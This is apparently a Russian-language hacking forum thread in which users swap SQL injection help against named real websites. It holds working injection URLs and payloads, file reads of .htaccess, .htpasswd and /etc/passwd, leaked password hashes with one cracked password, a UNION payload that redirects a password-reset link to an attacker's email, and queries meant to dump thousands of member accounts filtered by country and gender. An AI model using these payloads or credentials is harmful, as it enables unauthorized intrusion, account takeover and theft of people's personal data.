Code: http://www.nzp.co.nz/company.php?pg=79+and+substring(version(),1,1)=3 Третья ветка MySQL, про особенности проведения инъекций здеcь можно подробнее прочитать например тут: https://forum.antichat.ru/showpost.php?p=565034&postcount=4
[hide=1] наткнулся на непонятку: на сайте есть админка - site/admin/ через sql inj с load_file вытянул [user()=root@localhost] admin/.htaccess => AuthType Basic AuthName "bla bla" AuthUserFile /Users/serveradmin/Documents/.htpasswd Require user serveradmin файл /Users/serveradmin/Documents/.htpasswd через sql inj не тянется, вполне возможно его и нет. есть файл admin/.htpasswd => admin:t0oQM1tD4/ytw [=> nh84mk] jamie:OWkrWXnR/Sr46 но через admin/nh84mk авторизация не проходит. вопрос 1 - там соль (вроде соль же в .htpasswd не используется ?) или у меня не хватает прав прочесть /Users/serveradmin/Documents/.htpasswd ? или что-то еще ? доп инфа: /etc/passwd => nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false _mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false ... есть pureftpd.pdb, но как оттуда вытянуть пароли я не нашел вопрос 2: если включено экранирование кавычек то into outfile или его вариантом воспользоваться нельзя ? сайтом могу за помощь поделиться - я на нем просто тренируюсь там ничего интересного нет, кроме самой возможности заиметь дедик [/hide]
Нету там никакой соли. просто авторизация проходит по /Users/serveradmin/Documents/.htpasswd(на который нет прав для чтения мускулу), а не по admin/.htpasswd Если скуль двойная(что это?) - то можно, в обычном случае нельзя.
Первые два символа DES-хэша и есть соль. PHP: <?php echo crypt ('nh84mk', 't0'), "\n"; ?> Code: t0oQM1tD4/ytw Интересно, сколько этот пост проживет? )
Ребята, нашел sql inj на сайте и ничего с ней не получается. Вот сайт http://www.warsong.ws/exchange/?s=send
Code: ' AND NULL UNION SELECT '[COLOR=Red][email protected][/COLOR]',[color="Red"]1[/color]# Где 1 - id юзера, [email protected] - твой мейл. На него придет ссылка с подтверждением смены пароля для указаного id.
Такие вопросы 1) Могу ли я сделать два условия сразу т.е.: union%20select%20concat(M_uname,0x3a,M_dob,0x3a,M_lastlog,)%20from%20members%20where%20M_country='USA' and M_gender='M' limit+0,1%20-- т.е. мне нужны только мужики и америкосы. Правельно ли я реализовал запрос? Если нет то как можно реализовать такую задачу 2) При таком запросе без лимита выводится первый в списке, а мне нужно слить 8000 акков что при таком раскладе будет слегка затруднительно) union%20select%20concat(M_uname,0x3a,M_dob,0x3a,M_lastlog,)%20from%20members%20where%20M_country='USA' and M_gender='M' Пробывал делать так (выводится ошибка о не верном типе данных) : union%20select%20group_concat(M_uname,0x3a,M_dob,0x3a,M_lastlog,)%20from%20members%20where%20M_country='USA' and M_gender='M' (Ногами не пинать. Новичок.)
Нашел самую обыкновенную sql inj и никак не могу составить грамотно запрос. Помогите найти решение. http://www.warsong.ws/exchange/engine/repair.php?realm=1&guid='
http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10'+and+substring(version(),1,1)=5--+ version(): http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10'+or+(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2)))--+
Подскажите как отсюда вывести table_name из базы information_schema.tables ? http://www.warsong.ws/exchange/engine/repair.php?realm=1&guid='
http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10%27+or+%28select+count%28*%29+from+information_schema.tables+group+by+concat%28table_name,floor%28rand%280%29*%202%29%29%29--+ нубство